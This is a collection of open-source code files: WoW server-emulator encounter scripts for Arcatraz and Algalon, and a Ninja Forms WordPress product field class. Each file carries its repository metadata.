float attackRadius = me->GetAttackDistance(who)/10;
if (me->IsWithinDistInMap(who, attackRadius) && me->IsWithinLOSInMap(who))
EnterCombat(who);
}
}
void EnterCombat(Unit *who)
{
DoScriptText(YELL_INTRO1, me);
DoCast(me,SPELL_BUBBLE_VISUAL);
if (pInstance)
{
pInstance->SetData(TYPE_HARBINGERSKYRISS,IN_PROGRESS);
// raise the shield sphere that seals the warden's platform
if (GameObject* Sphere = GameObject::GetGameObject(*me,pInstance->GetData64(DATA_SPHERE_SHIELD)))
Sphere->SetGoState(GO_STATE_READY);
IsRunning = true;
}
}
// True when the prerequisite for the current Phase is met (previous cell's
// boss defeated, or the event itself just started for phases 1-2 and 4).
bool CanProgress()
{
if (pInstance)
{
if (Phase == 7 && pInstance->GetData(TYPE_WARDEN_4) == DONE)
return true;
if (Phase == 6 && pInstance->GetData(TYPE_WARDEN_3) == DONE)
return true;
if (Phase == 5 && pInstance->GetData(TYPE_WARDEN_2) == DONE)
return true;
if (Phase == 4)
return true;
if (Phase == 3 && pInstance->GetData(TYPE_WARDEN_1) == DONE)
return true;
if (Phase == 2 && pInstance->GetData(TYPE_HARBINGERSKYRISS) == IN_PROGRESS)
return true;
if (Phase == 1 && pInstance->GetData(TYPE_HARBINGERSKYRISS) == IN_PROGRESS)
return true;
return false;
}
return false;
}
// Beam the pod for the current Phase and flag its cell IN_PROGRESS; the
// actual summon happens later in UpdateAI once the timer elapses.
void DoPrepareForPhase()
{
if (pInstance)
{
me->InterruptNonMeleeSpells(true);
me->RemoveSpellsCausingAura(SPELL_AURA_DUMMY);
switch(Phase)
{
case 2:
DoCast(me,SPELL_TARGET_ALPHA);
pInstance->SetData(TYPE_WARDEN_1,IN_PROGRESS);
if (GameObject *Sphere = GameObject::GetGameObject(*me,pInstance->GetData64(DATA_SPHERE_SHIELD)))
Sphere->SetGoState(GO_STATE_READY);
break;
case 3:
DoCast(me,SPELL_TARGET_BETA);
pInstance->SetData(TYPE_WARDEN_2,IN_PROGRESS);
break;
case 5:
DoCast(me,SPELL_TARGET_DELTA);
pInstance->SetData(TYPE_WARDEN_3,IN_PROGRESS);
break;
case 6:
DoCast(me,SPELL_TARGET_GAMMA);
pInstance->SetData(TYPE_WARDEN_4,IN_PROGRESS);
break;
case 7:
pInstance->SetData(TYPE_WARDEN_5,IN_PROGRESS);
break;
}
CanSpawn = true;
}
}
void UpdateAI(const uint32 diff)
{
if (!IsRunning)
return;
if (EventProgress_Timer <= diff)
{
if (pInstance)
{
// wipe detected elsewhere: restart the whole event
if (pInstance->GetData(TYPE_HARBINGERSKYRISS) == FAIL)
Reset();
}
if (CanSpawn)
{
//continue beam omega pod, unless we are about to summon skyriss
if (Phase != 7)
DoCast(me,SPELL_TARGET_OMEGA);
// spawn the occupant of the pod prepared by DoPrepareForPhase();
// cells 2, 5 and 6 pick one of two possible inmates at random
switch(Phase)
{
case 2:
switch(rand()%2)
{
case 0: me->SummonCreature(ENTRY_TRICKSTER,478.326f,-148.505f,42.56f,3.19f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
case 1: me->SummonCreature(ENTRY_PH_HUNTER,478.326f,-148.505f,42.56f,3.19f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
}
break;
case 3:
me->SummonCreature(ENTRY_MILLHOUSE,413.292f,-148.378f,42.56f,6.27f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000);
break;
case 4:
DoScriptText(YELL_RELEASE2B, me);
break;
case 5:
switch(rand()%2)
{
case 0: me->SummonCreature(ENTRY_AKKIRIS,420.179f,-174.396f,42.58f,0.02f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
case 1: me->SummonCreature(ENTRY_SULFURON,420.179f,-174.396f,42.58f,0.02f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
}
break;
case 6:
switch(rand()%2)
{
case 0: me->SummonCreature(ENTRY_TW_DRAK,471.795f,-174.58f,42.58f,3.06f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
case 1: me->SummonCreature(ENTRY_BL_DRAK,471.795f,-174.58f,42.58f,3.06f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
}
break;
case 7:
me->SummonCreature(ENTRY_SKYRISS,445.763f,-191.639f,44.64f,1.60f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000);
DoScriptText(YELL_WELCOME, me);
break;
}
CanSpawn = false;
++Phase;
}
if (CanProgress())
{
// prerequisite met: announce and prepare the current phase; note that
// case 1 only advances Phase, the first pod is prepared in case 2
switch(Phase)
{
case 1:
DoScriptText(YELL_INTRO2, me);
EventProgress_Timer = 10000;
++Phase;
break;
case 2:
DoScriptText(YELL_RELEASE1, me);
DoPrepareForPhase();
EventProgress_Timer = 7000;
break;
case 3:
DoScriptText(YELL_RELEASE2A, me);
DoPrepareForPhase();
EventProgress_Timer = 10000;
break;
case 4:
DoPrepareForPhase();
EventProgress_Timer = 15000;
break;
case 5:
DoScriptText(YELL_RELEASE3, me);
DoPrepareForPhase();
EventProgress_Timer = 15000;
break;
case 6:
DoScriptText(YELL_RELEASE4, me);
DoPrepareForPhase();
EventProgress_Timer = 15000;
break;
case 7:
DoPrepareForPhase();
EventProgress_Timer = 15000;
break;
}
}
} else EventProgress_Timer -= diff;
}
};
// Factory hook used by the script registry: build the warden's event AI.
CreatureAI* GetAI_npc_warden_mellichar(Creature* pCreature)
{
    return new npc_warden_mellicharAI(pCreature);
}
/*#####
# mob_zerekethvoidzone (this script probably not needed in future -> `creature_template_addon`.`auras`='36120 0')
#####*/
#define SPELL_VOID_ZONE_DAMAGE 36120
// Passive void-zone trigger: on spawn it strips NPC flags, becomes hostile
// and unselectable, and applies its periodic damage aura to itself.
struct mob_zerekethvoidzoneAI : public ScriptedAI
{
mob_zerekethvoidzoneAI(Creature *c) : ScriptedAI(c) {}
void Reset()
{
me->SetUInt32Value(UNIT_NPC_FLAGS,0);
me->setFaction(16); // 16 = hostile-to-all monster faction
me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
DoCast(me,SPELL_VOID_ZONE_DAMAGE);
}
// never engages; damage comes entirely from the self-cast aura
void EnterCombat(Unit* who) {}
};
// Factory hook used by the script registry: build the void-zone AI.
CreatureAI* GetAI_mob_zerekethvoidzoneAI(Creature* pCreature)
{
    return new mob_zerekethvoidzoneAI(pCreature);
}
void AddSC_arcatraz()
{
Script *newscript;
newscript = new Script;
newscript->Name = "npc_millhouse_manastorm";
newscript->GetAI = &GetAI_npc_millhouse_manastorm;
newscript->RegisterSelf();
newscript = new Script;
newscript->Name = "npc_warden_mellichar";
newscript->GetAI = &GetAI_npc_warden_mellichar;
newscript->RegisterSelf();
newscript = new Script;
newscript->Name = "mob_zerekethvoidzone";
newscript->GetAI = &GetAI_mob_zerekethvoidzoneAI;
newscript->RegisterSelf();
}
| VovchiK/federation | src/scripts/Outland/TempestKeep/arcatraz/arcatraz.cpp | C++ | gpl-2.0 | 16,525 |
<?php if ( ! defined( 'ABSPATH' ) ) exit;
/**
* Class NF_Fields_Product
*/
class NF_Fields_Product extends NF_Abstracts_Input
{
protected $_name = 'product';
protected $_section = 'pricing';
protected $_icon = 'tag';
protected $_aliases = array();
protected $_type = 'product';
protected $_templates = array( 'product', 'textbox', 'hidden', 'listselect' );
protected $_test_value = '0';
// Field types that can be assigned to a product and participate in totals.
protected $processing_fields = array( 'quantity', 'modifier', 'shipping', 'tax', 'total' );
protected $_settings = array( 'product_use_quantity', 'product_price', 'product_type', 'product_type' );
protected $_settings_exclude = array( 'input_limit_set' );
/**
 * Register the field's labels, setting tweaks and render-time filters.
 */
public function __construct()
{
parent::__construct();
$this->_nicename = __( 'Product', 'ninja-forms' );
$this->_settings[ 'product_price' ][ 'width' ] = 'full';
// 'required' only makes sense when the user can enter a quantity.
$this->_settings[ 'required' ][ 'deps' ][ 'product_use_quantity' ] = 1;
add_filter( 'ninja_forms_merge_tag_value_product', array( $this, 'merge_tag_value' ), 10, 2 );
add_filter( 'ninja_forms_localize_field_' . $this->_name, array( $this, 'filter_required_setting' ) );
add_filter( 'ninja_forms_localize_field_' . $this->_name . '_preview', array( $this, 'filter_required_setting_preview' ) );
}
/**
 * Compute this product's line total during submission processing.
 *
 * Collects sibling fields (quantity/modifier/...) assigned to this product,
 * multiplies price by the quantity field's value — or by the product's own
 * value when it carries its own quantity — and appends the formatted total
 * to $data['product_totals'].
 *
 * @param array $product Field settings/value for this product field.
 * @param array $data    Full submission data; returned with totals appended.
 * @return array
 */
public function process( $product, $data )
{
$related = array();
foreach( $data[ 'fields' ] as $key => $field ){
if( ! in_array( $field[ 'type' ], $this->processing_fields ) ) continue;
$type = $field[ 'type' ];
if( ! isset( $field[ 'product_assignment' ] ) ) continue;
if( $product[ 'id' ] != $field[ 'product_assignment' ] ) continue;
$related[ $type ] = &$data[ 'fields' ][ $key ]; // Assign by reference
}
$total = floatval( $product[ 'product_price' ] );
if( isset( $related[ 'quantity' ][ 'value' ] ) && $related[ 'quantity' ][ 'value' ] ){
$total = $total * $related[ 'quantity' ][ 'value' ];
} elseif( $product[ 'product_use_quantity'] && $product[ 'value' ] ){
$total = $total * $product[ 'value' ];
}
if( isset( $related[ 'modifier' ] ) ){
//TODO: Handle multiple modifiers.
}
$data[ 'product_totals' ][] = number_format( $total, 2 );
return $data;
}
/**
 * Validate
 *
 * Quantity-enabled products honor the 'required' setting.
 * NOTE(review): the error string is not passed through a translation
 * function, unlike other user-facing text in this plugin — confirm intent.
 *
 * @param $field
 * @param $data
 * @return array $errors
 */
public function validate( $field, $data )
{
$errors = array();
if( isset( $field[ 'product_use_quantity' ] ) && 1 == $field[ 'product_use_quantity' ] ){
// Required check.
if( isset( $field['required'] ) && 1 == $field['required'] && ! trim( $field['value'] ) ){
$errors[] = 'Field is required.';
}
}
return $errors;
}
/**
 * Backend render filter: force 'required' off when quantity input is off.
 */
public function filter_required_setting( $field )
{
if( 0 == $field->get_setting( 'product_use_quantity', 0 ) ) {
$field->update_setting('required', 0);
}
return $field;
}
/**
 * Preview render filter: same rule as above, but on the array-shaped field.
 */
public function filter_required_setting_preview( $field )
{
if( ! isset( $field[ 'settings' ][ 'product_use_quantity' ] ) || 1 != $field[ 'settings' ][ 'product_use_quantity' ] ) {
$field[ 'settings' ][ 'required' ] = 0;
}
return $field;
}
/**
 * Merge-tag value: price times quantity, formatted as a dollar amount.
 * The existing TODO notes the hard-coded '$'/format pending a settings-based
 * currency formatter.
 */
public function merge_tag_value( $value, $field )
{
$product_price = ( isset( $field[ 'product_price' ] ) ) ? str_replace( '$', '', $field[ 'product_price' ] ) : 0;
$product_quantity = ( isset( $field[ 'product_use_quantity' ] ) && 1 == $field[ 'product_use_quantity' ] ) ? $value : 1;
// TODO: Extract a higher level currency formatting based on settings.
return '$' . number_format( $product_price * $product_quantity, 2 );
}
}
| BobRazoswki/ddp | wp-content/plugins/ninja-forms/includes/Fields/Product.php | PHP | gpl-2.0 | 3,910 |
/*
* Copyright (C) 2008-2017 TrinityCore <http://www.trinitycore.org/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "ScriptMgr.h"
#include "DBCStores.h"
#include "GameObject.h"
#include "GameObjectAI.h"
#include "InstanceScript.h"
#include "Map.h"
#include "MotionMaster.h"
#include "MoveSplineInit.h"
#include "ObjectAccessor.h"
#include "PassiveAI.h"
#include "Player.h"
#include "ScriptedCreature.h"
#include "Spell.h"
#include "SpellInfo.h"
#include "SpellScript.h"
#include "TemporarySummon.h"
#include "ulduar.h"
// Creature text group ids (creature_text table) for Brann Bronzebeard
// and Algalon the Observer.
enum Texts
{
    // Brann Bronzebeard
    SAY_BRANN_ALGALON_INTRO_1       = 0,
    SAY_BRANN_ALGALON_INTRO_2       = 1,
    SAY_BRANN_ALGALON_OUTRO         = 2,

    // Algalon the Observer
    SAY_ALGALON_INTRO_1             = 0,
    SAY_ALGALON_INTRO_2             = 1,
    SAY_ALGALON_INTRO_3             = 2,
    SAY_ALGALON_START_TIMER         = 3,
    SAY_ALGALON_AGGRO               = 4,
    SAY_ALGALON_COLLAPSING_STAR     = 5,
    EMOTE_ALGALON_COLLAPSING_STAR   = 6,
    SAY_ALGALON_BIG_BANG            = 7,
    EMOTE_ALGALON_BIG_BANG          = 8,
    SAY_ALGALON_ASCEND              = 9,
    EMOTE_ALGALON_COSMIC_SMASH      = 10,
    SAY_ALGALON_PHASE_TWO           = 11,
    SAY_ALGALON_OUTRO_1             = 12,
    SAY_ALGALON_OUTRO_2             = 13,
    SAY_ALGALON_OUTRO_3             = 14,
    SAY_ALGALON_OUTRO_4             = 15,
    SAY_ALGALON_OUTRO_5             = 16,
    SAY_ALGALON_DESPAWN_1           = 17,
    SAY_ALGALON_DESPAWN_2           = 18,
    SAY_ALGALON_DESPAWN_3           = 19,
    SAY_ALGALON_KILL                = 20,
};

// Spell ids used throughout the encounter, grouped by caster.
enum Spells
{
    // Algalon the Observer
    SPELL_ARRIVAL                       = 64997,
    SPELL_RIDE_THE_LIGHTNING            = 64986,
    SPELL_SUMMON_AZEROTH                = 64994,
    SPELL_REORIGINATION                 = 64996,
    SPELL_SUPERMASSIVE_FAIL             = 65311,
    SPELL_QUANTUM_STRIKE                = 64395,
    SPELL_PHASE_PUNCH                   = 64412,
    SPELL_BIG_BANG                      = 64443,
    SPELL_ASCEND_TO_THE_HEAVENS         = 64487,
    SPELL_COSMIC_SMASH                  = 62301,
    SPELL_COSMIC_SMASH_TRIGGERED        = 62304,
    SPELL_COSMIC_SMASH_VISUAL_STATE     = 62300,
    SPELL_SELF_STUN                     = 65256,
    SPELL_KILL_CREDIT                   = 65184,
    SPELL_TELEPORT                      = 62940,

    // Algalon Stalker
    SPELL_TRIGGER_3_ADDS                = 62266, // Triggers Living Constellation

    // Living Constellation
    SPELL_ARCANE_BARRAGE                = 64599,

    // Collapsing Star
    SPELL_COLLAPSE                      = 62018,
    SPELL_BLACK_HOLE_SPAWN_VISUAL       = 62003,
    SPELL_SUMMON_BLACK_HOLE             = 62189,

    // Black Hole
    SPELL_BLACK_HOLE_TRIGGER            = 62185,
    SPELL_CONSTELLATION_PHASE_TRIGGER   = 65508,
    SPELL_CONSTELLATION_PHASE_EFFECT    = 65509,
    SPELL_BLACK_HOLE_EXPLOSION          = 64122,
    SPELL_SUMMON_VOID_ZONE_VISUAL       = 64470,
    SPELL_VOID_ZONE_VISUAL              = 64469,
    SPELL_BLACK_HOLE_CREDIT             = 65312,

    // Worm Hole
    SPELL_WORM_HOLE_TRIGGER             = 65251,
    SPELL_SUMMON_UNLEASHED_DARK_MATTER  = 64450,
};
// Phase Punch alpha-overlay auras, one per stack of SPELL_PHASE_PUNCH
// (index 0 = first stack ... index 4 = fifth stack).
uint32 const PhasePunchAlphaId[5] = {64435, 64434, 64428, 64421, 64417};

// EventMap event ids shared by every AI in this script.
enum Events
{
    // Celestial Planetarium Access
    EVENT_DESPAWN_CONSOLE       = 1,

    // Brann Bronzebeard
    EVENT_BRANN_MOVE_INTRO      = 2,
    EVENT_SUMMON_ALGALON        = 3,
    EVENT_BRANN_OUTRO_1         = 4,
    EVENT_BRANN_OUTRO_2         = 5,

    // Algalon the Observer
    EVENT_INTRO_1               = 6,
    EVENT_INTRO_2               = 7,
    EVENT_INTRO_3               = 8,
    EVENT_INTRO_FINISH          = 9,
    EVENT_START_COMBAT          = 10,
    EVENT_INTRO_TIMER_DONE      = 11,
    EVENT_QUANTUM_STRIKE        = 12,
    EVENT_PHASE_PUNCH           = 13,
    EVENT_SUMMON_COLLAPSING_STAR = 14,
    EVENT_BIG_BANG              = 15,
    EVENT_RESUME_UPDATING       = 16,
    EVENT_ASCEND_TO_THE_HEAVENS = 17,
    EVENT_EVADE                 = 18,
    EVENT_COSMIC_SMASH          = 19,
    EVENT_UNLOCK_YELL           = 20,
    EVENT_OUTRO_START           = 21,
    EVENT_OUTRO_1               = 22,
    EVENT_OUTRO_2               = 23,
    EVENT_OUTRO_3               = 24,
    EVENT_OUTRO_4               = 25,
    EVENT_OUTRO_5               = 26,
    EVENT_OUTRO_6               = 27,
    EVENT_OUTRO_7               = 28,
    EVENT_OUTRO_8               = 29,
    EVENT_OUTRO_9               = 30,
    EVENT_OUTRO_10              = 31,
    EVENT_OUTRO_11              = 32,
    EVENT_OUTRO_12              = 33,
    EVENT_OUTRO_13              = 34,
    EVENT_OUTRO_14              = 35,
    EVENT_DESPAWN_ALGALON_1     = 36,
    EVENT_DESPAWN_ALGALON_2     = 37,
    EVENT_DESPAWN_ALGALON_3     = 38,

    // Living Constellation
    EVENT_ARCANE_BARRAGE        = 39,
};

// AI DoAction() command ids passed between scripts in this file.
enum Actions
{
    ACTION_START_INTRO      = 0,
    ACTION_FINISH_INTRO     = 1,
    ACTION_ACTIVATE_STAR    = 2,
    ACTION_BIG_BANG         = 3,
    ACTION_ASCEND           = 4,
    ACTION_OUTRO            = 5,
};

// Point-movement ids for MovementInform() callbacks.
enum Points
{
    POINT_BRANN_INTRO           = 0,
    MAX_BRANN_WAYPOINTS_INTRO   = 10,
    POINT_BRANN_OUTRO           = 10,
    POINT_BRANN_OUTRO_END       = 11,
    POINT_ALGALON_LAND          = 1,
    POINT_ALGALON_OUTRO         = 2,
};

// EventMap phases: ROLE_PLAY suppresses normal combat updates during
// intro/outro scenes; BIG_BANG pauses updates while Big Bang is cast.
enum EncounterPhases
{
    PHASE_NORMAL    = 0,
    PHASE_ROLE_PLAY = 1,
    PHASE_BIG_BANG  = 2
};

// Achievement hooks: timed-event id for "Supermassive" and the GetData()
// key used by the "He Feeds On Your Tears" achievement check.
enum AchievmentInfo
{
    EVENT_ID_SUPERMASSIVE_START = 21697,
    DATA_HAS_FED_ON_TEARS       = 30043005,
};
// Spawn point for Brann at the start of the intro scene.
Position const BrannIntroSpawnPos = {1676.277f, -162.5308f, 427.3326f, 3.235537f};

// Brann's intro path: walks in, delivers the intro, then retraces his
// steps back out (the second half mirrors the first).
Position const BrannIntroWaypoint[MAX_BRANN_WAYPOINTS_INTRO] =
{
    {1642.482f, -164.0812f, 427.2602f, 0.0f},
    {1635.000f, -169.5145f, 427.2523f, 0.0f},
    {1632.814f, -173.9334f, 427.2621f, 0.0f},
    {1632.676f, -190.5927f, 425.8831f, 0.0f},
    {1631.497f, -214.2221f, 418.1152f, 0.0f},
    {1624.717f, -224.6876f, 418.1152f, 0.0f},
    {1631.497f, -214.2221f, 418.1152f, 0.0f},
    {1632.676f, -190.5927f, 425.8831f, 0.0f},
    {1632.814f, -173.9334f, 427.2621f, 0.0f},
    {1635.000f, -169.5145f, 427.2523f, 0.0f},
};

// Algalon appears in the air and descends to the landing position.
Position const AlgalonSummonPos = {1632.531f, -304.8516f, 450.1123f, 1.530165f};
Position const AlgalonLandPos = {1632.668f, -302.7656f, 417.3211f, 1.530165f};

// Spawn points for the Living Constellations around the room.
#define LIVING_CONSTELLATION_COUNT 11
Position const ConstellationPos[LIVING_CONSTELLATION_COUNT] =
{
    {1625.208f, -267.2771f, 446.4296f, 5.044002f},
    {1658.279f, -262.5490f, 441.9073f, 4.188790f},
    {1678.677f, -276.3280f, 427.7531f, 3.979351f},
    {1593.389f, -299.4325f, 432.4636f, 6.073746f},
    {1685.613f, -300.1219f, 443.2366f, 3.385939f},
    {1591.706f, -263.8201f, 441.4153f, 5.253441f},
    {1668.317f, -324.7676f, 457.9394f, 3.211406f},
    {1592.242f, -325.5323f, 446.9508f, 0.226893f},
    {1635.821f, -363.3442f, 424.3459f, 1.466077f},
    {1672.188f, -357.2484f, 436.7337f, 2.338741f},
    {1615.800f, -348.0065f, 442.9586f, 1.134464f},
};

// Spawn points reused for Collapsing Stars (phase one) and Worm Holes
// (phase two).
#define COLLAPSING_STAR_COUNT 4
Position const CollapsingStarPos[COLLAPSING_STAR_COUNT] =
{
    {1649.438f, -319.8127f, 418.3941f, 1.082104f},
    {1647.005f, -288.6790f, 417.3955f, 3.490659f},
    {1622.451f, -321.1563f, 417.6188f, 4.677482f},
    {1615.060f, -291.6816f, 417.7796f, 3.490659f},
};

// Algalon's outro position and Brann's outro waypoints
// ([0] spawn, [1] walk-in, [2] walk-out).
Position const AlgalonOutroPos = {1633.64f, -317.78f, 417.3211f, 0.0f};
Position const BrannOutroPos[3] =
{
    {1632.023f, -243.7434f, 417.9118f, 0.0f},
    {1631.986f, -297.7831f, 417.3210f, 0.0f},
    {1633.832f, -216.2948f, 417.0463f, 0.0f},
};
// Repeating event attached to a random Algalon stalker: while the encounter
// is in progress, periodically casts SPELL_TRIGGER_3_ADDS to activate
// Living Constellations. Self-deletes once the encounter is no longer
// IN_PROGRESS.
class ActivateLivingConstellation : public BasicEvent
{
    public:
        ActivateLivingConstellation(Unit* owner) : _owner(owner), _instance(owner->GetInstanceScript())
        {
        }

        bool Execute(uint64 execTime, uint32 /*diff*/) override
        {
            if (!_instance || _instance->GetBossState(BOSS_ALGALON) != IN_PROGRESS)
                return true;    // delete event

            _owner->CastSpell(nullptr, SPELL_TRIGGER_3_ADDS, TRIGGERED_FULL_MASK);
            // Re-arm this same event object 45-50 seconds from now.
            _owner->m_Events.AddEvent(this, execTime + urand(45000, 50000));
            return false;
        }

    private:
        Unit* _owner;
        InstanceScript* _instance;
};
class CosmicSmashDamageEvent : public BasicEvent
{
public:
CosmicSmashDamageEvent(Unit* caster) : _caster(caster)
{
}
bool Execute(uint64 /*execTime*/, uint32 /*diff*/) override
{
_caster->CastSpell(nullptr, SPELL_COSMIC_SMASH_TRIGGERED, TRIGGERED_FULL_MASK);
return true;
}
private:
Unit* _caster;
};
class SummonUnleashedDarkMatter : public BasicEvent
{
public:
SummonUnleashedDarkMatter(Unit* caster) : _caster(caster)
{
}
bool Execute(uint64 execTime, uint32 /*diff*/) override
{
_caster->CastSpell(nullptr, SPELL_SUMMON_UNLEASHED_DARK_MATTER, TRIGGERED_FULL_MASK);
_caster->m_Events.AddEvent(this, execTime + 30000);
return false;
}
private:
Unit* _caster;
};
// Algalon the Observer. Drives the intro scene (summon + landing), the
// two-phase fight (Collapsing Stars -> Worm Holes at 20% HP), the Big Bang
// pause phase, the one-hour berserk (Ascend to the Heavens) and both the
// victory outro and the despawn sequence. Heavy use of EventMap phases:
// PHASE_ROLE_PLAY/PHASE_BIG_BANG suppress the normal UpdateVictim() gate.
class boss_algalon_the_observer : public CreatureScript
{
    public:
        boss_algalon_the_observer() : CreatureScript("boss_algalon_the_observer") { }

        struct boss_algalon_the_observerAI : public BossAI
        {
            boss_algalon_the_observerAI(Creature* creature) : BossAI(creature, BOSS_ALGALON)
            {
                Initialize();
                // These two survive Reset(): the intro only plays on the first
                // pull and the tears flag feeds an achievement check.
                _firstPull = true;
                _fedOnTears = false;
            }

            // Per-attempt state, cleared on every Reset().
            void Initialize()
            {
                _phaseTwo = false;
                _fightWon = false;
                _hasYelled = false;
            }

            void Reset() override
            {
                _Reset();
                me->SetReactState(REACT_PASSIVE);
                Initialize();
            }

            void KilledUnit(Unit* victim) override
            {
                if (victim->GetTypeId() == TYPEID_PLAYER)
                {
                    // Used by DATA_HAS_FED_ON_TEARS (achievement condition).
                    _fedOnTears = true;
                    // Throttle the kill yell: one Talk per EVENT_UNLOCK_YELL window.
                    if (!_hasYelled)
                    {
                        _hasYelled = true;
                        events.ScheduleEvent(EVENT_UNLOCK_YELL, 1000);
                        Talk(SAY_ALGALON_KILL);
                    }
                }
            }

            void DoAction(int32 action) override
            {
                switch (action)
                {
                    // Played once, right after Brann summons Algalon: descend
                    // from the air to the landing spot while the intro lines run.
                    case ACTION_START_INTRO:
                    {
                        me->SetFlag(UNIT_FIELD_FLAGS_2, UNIT_FLAG2_INSTANTLY_APPEAR_MODEL);
                        me->SetDisableGravity(true);
                        DoCast(me, SPELL_ARRIVAL, true);
                        DoCast(me, SPELL_RIDE_THE_LIGHTNING, true);
                        me->GetMotionMaster()->MovePoint(POINT_ALGALON_LAND, AlgalonLandPos);
                        me->SetHomePosition(AlgalonLandPos);
                        Movement::MoveSplineInit init(me);
                        init.MoveTo(AlgalonLandPos.GetPositionX(), AlgalonLandPos.GetPositionY(), AlgalonLandPos.GetPositionZ(), false);
                        init.SetOrientationFixed(true);
                        init.Launch();
                        events.Reset();
                        events.SetPhase(PHASE_ROLE_PLAY);
                        events.ScheduleEvent(EVENT_INTRO_1, 5000, 0, PHASE_ROLE_PLAY);
                        events.ScheduleEvent(EVENT_INTRO_2, 15000, 0, PHASE_ROLE_PLAY);
                        events.ScheduleEvent(EVENT_INTRO_3, 23000, 0, PHASE_ROLE_PLAY);
                        events.ScheduleEvent(EVENT_INTRO_FINISH, 36000, 0, PHASE_ROLE_PLAY);
                        break;
                    }
                    // Requested by the Big Bang spell script when nobody survived
                    // in the normal phase: berserk instead of resuming.
                    case ACTION_ASCEND:
                        events.SetPhase(PHASE_BIG_BANG);
                        events.CancelEvent(EVENT_RESUME_UPDATING);
                        events.ScheduleEvent(EVENT_ASCEND_TO_THE_HEAVENS, 1500);
                        break;
                    // One-hour timer expired (instance script): play the despawn
                    // lines and remove Algalon. (Id shared with the instance data key.)
                    case EVENT_DESPAWN_ALGALON:
                        events.Reset();
                        events.SetPhase(PHASE_ROLE_PLAY);
                        if (me->IsInCombat())
                            events.ScheduleEvent(EVENT_ASCEND_TO_THE_HEAVENS, 1);
                        events.ScheduleEvent(EVENT_DESPAWN_ALGALON_1, 5000);
                        events.ScheduleEvent(EVENT_DESPAWN_ALGALON_2, 17000);
                        events.ScheduleEvent(EVENT_DESPAWN_ALGALON_3, 26000);
                        me->DespawnOrUnsummon(34000);
                        me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
                        me->SetImmuneToNPC(true);
                        break;
                    // Re-spawned on a later attempt: skip the intro scene.
                    case ACTION_INIT_ALGALON:
                        _firstPull = false;
                        me->SetImmuneToPC(false);
                        break;
                }
            }

            uint32 GetData(uint32 type) const override
            {
                // Achievement query; any other key reports 1.
                return type == DATA_HAS_FED_ON_TEARS ? _fedOnTears : 1;
            }

            void EnterCombat(Unit* /*target*/) override
            {
                // First pull runs the "start timer" role-play before combat
                // begins, so all combat timers are pushed back by introDelay.
                uint32 introDelay = 0;
                me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
                me->SetImmuneToNPC(true);
                events.Reset();
                events.SetPhase(PHASE_ROLE_PLAY);
                if (!_firstPull)
                {
                    Talk(SAY_ALGALON_AGGRO);
                    _EnterCombat();
                    introDelay = 8000;
                }
                else
                {
                    _firstPull = false;
                    Talk(SAY_ALGALON_START_TIMER);
                    if (Creature* brann = instance->GetCreature(DATA_BRANN_BRONZEBEARD_ALG))
                        brann->AI()->DoAction(ACTION_FINISH_INTRO);
                    me->setActive(true);
                    DoZoneInCombat();
                    introDelay = 26000;
                    summons.DespawnEntry(NPC_AZEROTH);
                    // Starts the 1-hour despawn countdown in the instance script.
                    instance->SetData(EVENT_DESPAWN_ALGALON, 0);
                    events.ScheduleEvent(EVENT_START_COMBAT, 18000);
                }
                events.ScheduleEvent(EVENT_INTRO_TIMER_DONE, introDelay);
                events.ScheduleEvent(EVENT_QUANTUM_STRIKE, 3500 + introDelay);
                events.ScheduleEvent(EVENT_PHASE_PUNCH, 15500 + introDelay);
                events.ScheduleEvent(EVENT_SUMMON_COLLAPSING_STAR, 18000 + introDelay);
                events.ScheduleEvent(EVENT_BIG_BANG, 90000 + introDelay);
                // 6-minute soft enrage.
                events.ScheduleEvent(EVENT_ASCEND_TO_THE_HEAVENS, 360000 + introDelay);
                events.ScheduleEvent(EVENT_COSMIC_SMASH, 25000 + introDelay);

                // Clear any leftover stalker events (constellation activators)
                // from a previous attempt.
                std::list<Creature*> stalkers;
                me->GetCreatureListWithEntryInGrid(stalkers, NPC_ALGALON_STALKER, 200.0f);
                for (std::list<Creature*>::iterator itr = stalkers.begin(); itr != stalkers.end(); ++itr)
                    (*itr)->m_Events.KillAllEvents(true);
            }

            void MovementInform(uint32 movementType, uint32 pointId) override
            {
                if (movementType != POINT_MOTION_TYPE)
                    return;

                if (pointId == POINT_ALGALON_LAND)
                    me->SetDisableGravity(false);
                else if (pointId == POINT_ALGALON_OUTRO)
                {
                    // Reached center of the room: run the victory outro script.
                    me->SetFacingTo(1.605703f);
                    events.ScheduleEvent(EVENT_OUTRO_3, 1200);
                    events.ScheduleEvent(EVENT_OUTRO_4, 2400);
                    events.ScheduleEvent(EVENT_OUTRO_5, 8500);
                    events.ScheduleEvent(EVENT_OUTRO_6, 15500);
                    events.ScheduleEvent(EVENT_OUTRO_7, 55500);
                    events.ScheduleEvent(EVENT_OUTRO_8, 73500);
                    events.ScheduleEvent(EVENT_OUTRO_9, 85500);
                    events.ScheduleEvent(EVENT_OUTRO_10, 108500);
                    events.ScheduleEvent(EVENT_OUTRO_11, 123500);
                }
            }

            // Per-summon setup for every add type this encounter spawns.
            void JustSummoned(Creature* summon) override
            {
                summons.Summon(summon);
                switch (summon->GetEntry())
                {
                    case NPC_AZEROTH:
                        DoCastAOE(SPELL_REORIGINATION, true);
                        break;
                    case NPC_COLLAPSING_STAR:
                        summon->SetReactState(REACT_PASSIVE);
                        summon->GetMotionMaster()->MoveRandom(20.0f);
